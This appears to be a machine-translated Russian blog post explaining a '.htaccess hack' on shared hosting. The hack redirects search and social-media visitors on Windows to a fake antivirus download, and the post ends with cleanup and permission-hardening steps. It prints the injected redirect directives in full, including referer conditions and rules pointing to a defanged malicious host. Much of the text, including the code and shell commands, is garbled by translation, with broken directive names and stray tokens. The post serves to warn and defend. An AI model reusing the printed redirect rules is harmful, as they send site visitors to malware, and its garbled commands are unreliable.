Новая форма вируса о котором я вижу, что мало что известно, влияет на размещенные сайты на Небезопасные серверы Где учетные записи пользователя / субдомена могут “видеть” между ними. В частности, учетные записи хостинга помещаются в папку “Vhosts“и право писать пользовательская папка ОТ “Vhosts” дается общему пользователю… сброса в большинстве ситуаций. Это типичный веб -метод серверов, которые не используют WHM/CPanelПолем
содержание
Действие вируса .htaccess – .htaccess Hack
вирус влияет на файлы .htaccess сайта жертвы. Добавлены линии / Директива который будет Перенаправить посетителей (Приходите из Yahoo, MSN, Google, Facebook, Yaindex, Twitter, MySpace и т. Д. “Антивирусные растворы“Полем Это о Фальшивые антивирусные растворы, который я написал во введении Поддельное антивирусное устранениеПолем
Вот как а .htaccess затронутый: (Не получайте доступа к URL -адресам из содержимого линий ниже)
Errordocument 500 hxxp: //wwww.peoriavascularsurgery.com/main.php? I = j8iiidsar/qmirj7v8noyjoxpa ==&e = 0
Errordocument 502 hxxp: //wwww.peoriavascularsurgery.com/main.php? I = j8iiidsar/qmirj7v8noyjoxpa ==&E = 2
Errordocument 403 hxxp: //wwww.peoriavascularsurgery.com/main.php? I = j8iiidsar/qmirj7v8noyjoxpa ==&E = 3Перезаритейн на
Rewritecond %{http_referer}.*Yandex.*$ [Nc, или]
Rewritecond %{http_referer}.*Odnoklassniki.*$ [Nc, или]
Rewritecond %{http_referer}.*Vkontakte.*$ [Nc, или]
Rewritecond %{http_referer}.*Rambler.*$ [Nc, или]
Rewritecond %{http_referer}.*Tube.*$ [Nc, или]
rewritecond %{http_referer}.*Wikipedia.*$ [NC, или]
Rewritecond %{http_referer}.*Blogger.*$ [Nc, или]
Rewritecond %{http_referer}.*Baidu.*$ [Nc, или]
Rewritecond %{http_referer}.*Qq.com.*$ [Nc, или]
Rewritecond %{http_referer}.*Myspace.*$ [Nc, или]
Rewritecond %{http_referer}.*Twitter.*$ [Nc, или]
Rewritecond %{http_referer}.*Facebook.*$ [Nc, или]
Rewritecond %{http_referer}.*Google.*$ [Nc, или]
Rewritecond %{http_referer}.*Live.*$ [Nc, или]
Rewritecond %{http_referer}.*Aol.*$ [Nc, или]
Rewritecond %{http_referer}.*Bing.*$ [Nc, или]
Rewritecond %{http_referer}.*Msn.*$ [Nc, или]
Rewritecond %{http_referer}.*Amazon.*$ [Nc, или]
Rewritecond %{http_referer}.*Ebay.*$ [Nc, или]
Rewritecond %{http_referer}.*LinkedIn.*$ [NC, или]
Rewritecond %{http_referer}.*Flickr.*$ [Nc, или]
Rewritecond %{http_referer}.*Livejasmin.*$ [Nc, или]
Rewritecond %{http_referer}.*Soso.*$ [Nc, или]
Rewritecond %{http_referer}.*Doubleclick.*$ [Nc, или]
Rewritecond %{http_referer}.*Pornhub.*$ [Nc, или]
Rewritecond %{http_referer}.*Orkut.*$ [Nc, или]
Rewritecond %{http_referer}.*Livejournal.*$ [Nc, или]
Rewritecond %{http_referer}.*Wordpress.*$ [Nc, или]
Rewritecond %{http_referer}.*Yahoo.*$ [Nc, или]
Rewritecond %{http_referer}.*Ask.*$ [Nc, или]
Rewritecond %{http_referer}.*Excite.*$ [Nc, или]
Rewritecond %{http_referer}.*Altavista.*$ [Nc, или]
Rewritecond %{http_referer}.*Msn.*$ [Nc, или]
Rewritecond %{http_referer}.*Netscape.*$ [Nc, или]
Rewritecond %{http_referer}.*Hotbot.*$ [Nc, или]
Rewritecond %{http_referer}.*Goto.*$ [Nc, или]
Rewritecond %{http_referer}.*Infoseek.*$ [Nc, или]
Rewritecond %{http_referer}.*Мама.*$ [Nc, или]
Rewritecond %{http_referer}.*Alltheweb.*$ [Nc, или]
Rewritecond %{http_referer}.*Lycos.*$ [Nc, или]
Rewritecond %{http_referer}.*Search.*$ [Nc, или]
Rewritecond %{http_referer}.*Metacrawler.*$ [Nc, или]
Rewritecond %{http_referer}.*Mail.*$ [Nc, или]
Rewritecond %{http_referer}.*Dogpile.*$ [Nc]Rewritecond %{http_user_agent}.*Windows.*
Rewiriterule.* Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =%{http_host}&i = j8iiidsar/qmirj7v8noyjoxpa ==&e = r [r, l]Rewritecond %{request_filename}! -F
Rewritecond %{request_filename}! -D
Rewritecond %{request_filename}!.*Jpg $ |.*Gif $ |.*Png $
Rewritecond %{http_user_agent}.*Windows.*
Rewiriterule.* Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =%{http_host}&i = j8iiidsar/qmirj7v8noyjoxpa ==&E = 4 [R, L]
Те, кто использует WordPress, найдут эти строки в файле .htaccess ОТ public_htmlПолем Кроме того, вирус создает идентичный .htaccess в папке wp-contentПолем
*Существуют также ситуации, когда появляется peoriavascularsurgery.com dns.theoulfoodcafe.com или другие адреса.
Что делает этот вирус.
После перенаправления посетителя встречает с открытыми руками сообщением:
Предупреждение!
Ваш компьютер содержит различные признаки присутствия вирусов и вредоносных программ. Ваша система требует немедленной антивирусной проверки!
Безопасность системы выполнит быстрое и бесплатное сканирование вашего ПК на предмет вирусов и вредоносных программ.
Независимо от того, какую кнопку мы нажимаем, нас отвезли на страницу “Мой компьютер“, создан, чтобы подражать XP дизайнПолем Здесь он начинается автоматически “процесс сканирования”, в конце которого мы обнаруживаем, что “Мы заражены”Полем
После того, как мы нажмите OK или отмените, он начнется скачатьв файл setup.exeПолем Этот setup.exe - ложный анти вирус которые влияют на систему. Установит серию применений вредоносных программ, которые дополнительно распространяют вирусы, а также Программное обеспечение антивирус (все ложь), что жертве приглашается купить.
Те, кто уже связался с этой формой вируса, могут использовать Поддельное антивирусное устранениеПолем Весь сканирование жесткого диска также рекомендуется. рекомендую Касперский интернет -безопасность или Касперский анти вирусПолем
Эта форма вируса влияет на операционные системы посетителей с помощью операционных систем Windows XP, Windows Me, Windows 2000, Windows NT, Windows 98 и Windows 95. До сих пор нет никаких случаев заражения операционными системами Windows Vista и Windows 7 не известны.
Как мы можем удалить этот вирус .htaccess с сервера и как мы можем предотвратить инфекцию.
1 Анализ файлов и удаление подозрительных кодов. Чтобы гарантировать, что файл не только затронут .htaccess Это хорошо Мы анализируем все файлы .php и .jsПолем
2. Мы переписываем файл .htaccess и устанавливаем их CHMOD 644 или 744 с правами на написание только на пользователь-владелецПолем
3. При создании учетной записи хостинга для сайта, в папке /дом или /webroot Будет автоматически создана папка, которая чаще всего имеет имя пользователя (Пользователь CPANEL, FTP, и т. д.). Чтобы предотвратить написание данных и передачу вирусов от одного пользователя к другому, указано, что каждая пользовательская папка будет установлена:
Chmod 644 Sau 744, 755 – Указано 644.
chown -r nume_user nume_folder.
chgrp -r nume_user nume_folder
LS -All Чтобы проверить, правильно ли размещены режимы. Что -то должно появиться в роде:
DRWX–х–x 12 Dinamics Dinamics 4096 6 мая 14:51 Dinamics/
DRWX–х–x 10 Duran Duran 4096 7 марта 07:46 Duran/
DRWX–х–x 12 Трубки Трубки 4096 январь 29 11:23 Трубки/
DRWXR-XR-X 14 Express Express 4096 Feb 26 2009 Express/
DRWXR-X 9 те 4096 мая 19 мая 01:09 те /
DRWX–х–X 9 ферма ферма 4096 декабря 19 22:29 ферма/
Если один из вышеперечисленных пользователей будет иметь на FTP Вирусные файлы, он не сможет отправить вирус другому пользователю hostat. Это минимальная мера безопасности для защиты учетных записей на веб -сервере.
Общие элементы областей, затронутых этим вирусом.
Все пострадавшие районы перенаправляют посетителей на сайты, которые по доменному имени содержат “/main.php? e = 4&час“Полем
Этот “Вирус де .htaccess” влияют на любой тип CMS (Joomla, WordPress, PHPBBи т. д.), который использует .htaccessПолем
.htaccess hack & ПеренаправитьПолем
